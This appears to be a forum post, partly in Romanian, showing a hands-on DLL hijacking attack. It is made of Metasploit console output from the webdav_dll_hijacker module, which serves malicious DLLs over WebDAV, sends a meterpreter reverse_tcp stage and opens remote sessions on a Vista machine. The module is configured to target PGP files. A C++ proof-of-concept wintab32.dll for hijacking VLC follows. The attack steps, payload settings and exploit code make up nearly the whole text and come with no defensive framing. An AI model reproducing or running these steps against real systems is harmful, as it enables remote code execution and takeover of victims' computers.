PROPFIND /documents [*] 192.168.2.45:49310 PROPFIND => 301 (/documents) [*] 192.168.2.45:49310 PROPFIND /documents/ [*] 192.168.2.45:49310 PROPFIND => 207 Directory (/documents/) [*] 192.168.2.45:49310 PROPFIND => 207 Top-Level Directory [*] 192.168.2.45:49310 PROPFIND /DOCUMENTS [*] 192.168.2.45:49310 PROPFIND => 301 (/DOCUMENTS) [*] 192.168.2.45:49310 PROPFIND /DOCUMENTS/ [*] 192.168.2.45:49310 PROPFIND => 207 Directory (/DOCUMENTS/) [*] 192.168.2.45:49310 PROPFIND => 207 Top-Level Directory [*] 192.168.2.45:49310 PROPFIND /documents/rsaenh.dll [*] 192.168.2.45:49310 PROPFIND => 207 File (/documents/rsaenh.dll) [*] 192.168.2.45:49310 PROPFIND /DOCUMENTS [*] 192.168.2.45:49310 PROPFIND => 301 (/DOCUMENTS) [*] 192.168.2.45:49310 PROPFIND /DOCUMENTS/ [*] 192.168.2.45:49310 PROPFIND => 207 Directory (/DOCUMENTS/) [*] 192.168.2.45:49310 PROPFIND => 207 Top-Level Directory [*] 192.168.2.45:49310 GET => DLL Payload [*] 192.168.2.45:49310 PROPFIND /documents/SDDisk.dll [*] 192.168.2.45:49310 PROPFIND => 207 Directory (/DOCUMENTS/) [*] 192.168.2.45:49310 PROPFIND => 207 Top-Level Directory [*] Sending stage (748544 bytes) to 192.168.2.37 [*] Meterpreter session 14 opened (192.168.2.37:4444 -> 192.168.2.45:49315) msf exploit(webdav_dll_hijacker) > sessions -i 14 [*] Starting interaction with 14... meterpreter > getuid Server username: root-Vista\neox ----------------------------------------------------------------------------------------- PGP - Insecure Library Loading Allows Remote Code Execution (DLL Hijacking) msf exploit(webdav_dll_hijacker) > set EXTENSIONS pgp EXTENSIONS => pgp msf exploit(webdav_dll_hijacker) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- BASENAME policy yes The base name for the listed files. EXTENSIONS pgp yes The list of extensions to generate SHARENAME documents yes The name of the top-level share. SRVHOST 192.168.2.37 yes The local host to listen on. SRVPORT 80 yes The daemon port to listen on (do not change) URIPATH / yes The URI to use (do not change). Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique: seh, thread, process LHOST 192.168.2.37 yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic msf exploit(webdav_dll_hijacker) > exploit [*] Exploit running as background job. [*] Started reverse handler on 192.168.2.37:4444 [*] [*] Exploit links are now available at \\192.168.2.37\documents\ [*] [*] Using URL: http://192.168.2.37/ [*] Server started. <snip> [*] 192.168.2.45:49183 PROPFIND /documents/ [*] 192.168.2.45:49183 PROPFIND => 207 Directory (/documents/) [*] 192.168.2.45:49183 PROPFIND => 207 Top-Level Directory [*] 192.168.2.45:49183 PROPFIND /documents/policy.pgp [*] 192.168.2.45:49183 PROPFIND => 207 File (/documents/policy.pgp) [*] 192.168.2.45:49183 PROPFIND /documents/credssp.dll [*] 192.168.2.45:49183 PROPFIND => 207 File (/documents/credssp.dll) [*] 192.168.2.45:49183 PROPFIND / [*] 192.168.2.45:49183 PROPFIND => 207 Directory (/) [*] 192.168.2.45:49183 PROPFIND => 207 Top-Level Directory [*] 192.168.2.45:49183 GET => DLL Payload [*] 192.168.2.45:49183 PROPFIND /DOCUMENTS [*] 192.168.2.45:49183 PROPFIND => 301 (/DOCUMENTS) [*] 192.168.2.45:49183 PROPFIND /DOCUMENTS/ [*] 192.168.2.45:49183 PROPFIND => 207 Directory (/DOCUMENTS/) [*] 192.168.2.45:49183 PROPFIND => 207 Top-Level Directory [*] 192.168.2.45:49183 PROPFIND /documents/rundll32.exe [*] 192.168.2.45:49183 PROPFIND => 404 (/documents/rundll32.exe) [*] Sending stage (748544 bytes) to 10.8.28.55 [*] Meterpreter session 1 opened (192.168.2.37:4444 -> 192.168.2.45:49189) at Sun Aug 29 20:40:27 +0200 2010 msf exploit(webdav_dll_hijacker) > sessions -i 1 [*] Starting interaction with 1... meterpreter > getuid Server username: neox-Vista\neox si mai sint doua modalitati una ii de exemplu vclplayer cum descrie pe exploitdb codat in ollydbg Place a .mp3 file and wintab32.dll in same folder and execute .mp3 file in vlc player. Code for wintab32.dll: /*----------*/ /* wintab32.cpp */ #include "stdafx.h" #include "dragon.h" void init() { MessageBox(NULL,"Pwned", "Pwned!",0x00000003); } BOOL APIENTRY DllMain( HANDLE hModule, DWORD ul_reason_for_call, LPVOID lpReserved ) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: init();break; case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; } /*----------*/ la asta fac eu un video cint am timp si a treia modalitate lucrez deocamdata la ia ....
×
×
  • Create New...